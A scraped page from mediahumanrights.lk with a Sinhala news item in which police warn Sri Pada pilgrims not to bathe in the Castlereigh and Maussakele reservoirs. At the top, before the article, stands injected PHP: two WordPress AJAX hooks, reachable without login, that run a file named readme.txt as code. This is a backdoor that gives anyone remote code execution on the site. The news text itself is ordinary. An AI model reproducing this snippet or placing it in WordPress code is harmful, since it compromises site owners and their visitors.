if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ශ්‍රීපාදේ එනවා නම් මේ තැන් වලින් නාන්න එපා - පොලිසිය කියයි - mediahumanrights.lk
mediahumanrights.lk
Local News News

ශ්‍රීපාදේ එනවා නම් මේ තැන් වලින් නාන්න එපා – පොලිසිය කියයි

ශ්‍රී පාද වන්දනාවේ පැමිණිමේදි කාසල්රි සහ මාවුස්සාකැලේ ජලාශ වලින් දියනෑම සිදු නොකරන ලෙසට පොලිසියෙන් වන්දනාකරුවන්ගෙන් ඉල්ලා සිටියි.
ශ්‍රි පාද වන්දනාවේ හැටන් මාර්ගයෙ ඔස්සේ පැමිණීමේදි කාසල්රි සහ මාවුස්සාකැලේ ජලාශ වලින් දියනෑම සිදුනොකරන ලෙසට පොලිසිය වන්දනාකරුවන්ගෙන් ඉල්ලිමක් කරන අතර එම ජලාශ වල ජලය අධි ඝනත්වයෙන් සහ අධික ශිතල ගතියෙන් යුක්ත නිසා එය දියනෑම අවධානමි බවයි පොලිසිය කියා සිටින්නේ.
හැටන් මාර්ගය ඔස්සේ දියනෑම සදහා ආරක්‍ෂිත ස්ථාන කිහිපයක් මාර්ගය දෙපස අඹගමුව ප‍්‍රාදේශිය සභාව මගින් ස්ථාපනය කර ඇති නිසා ඒවායෙන් දියනැම සිදුකරන ලෙසයි පොලිසිය කියා සිටින්නේ.
තවද එම මාර්ග අධික වංගු සහ බෑවුම් සහිත නිසා එම මාර්ග වල වාහන ධාවනය කිරිමේදි හා වාහන ගාල් කිරිමේදි සැලකිලිමත් වන ලෙස ද රියදුරන්ගෙන් පොලිසිය ඉල්ලා සිටියි.
තවද ශ්‍රී පාද පරිසරය රැක ගැනිමට ශ්‍රී පාදස්ථානාධිපති සබරගමු පළාතේ ප‍්‍රධන සංඝනායක හා ඌව වෙල්ලස්ස විශ්ව විද්‍යාලයේ කුලපති බෙංගමුවේ ධමිම දින්න නායක ස්වාමින් වහන්සේගේ උපදෙස් පරිදි පොලිසිය අඹගමුව ප‍්‍රාදේශිය සභාව එක්ව කි‍්‍රයාත්මක කරන පරිසරය රැක ගැනිමට දියත් කර ඇති වැඩ සටහන් වලට සහයෝගය දක්වන ලෙසද පොලිසිය වන්දනාකරුවන්ගෙන් ඉල්ලිමක් කරයි.

(under the courtesy of adaderana.lk news web)

Related posts

හේමසිරි සහ පුජිත්ට අදාළ විමර්ශන අවසන් : CIDය අධිකරණයට දැනුම් දෙයි

Shiran Viraj

රජයේ ගුරුවරුන් තම පන්තියේ සිසුනට ටියුෂන් දීමට තහනමක් නෑ..- අධ්‍යාපන නි. ඇමති

Shiran Viraj

කොරෝනා අවදානම මැද පිලිපීනයට 03වැනි කාණ්ඩයේ සුළි කුණාටුවක්

Shiran Viraj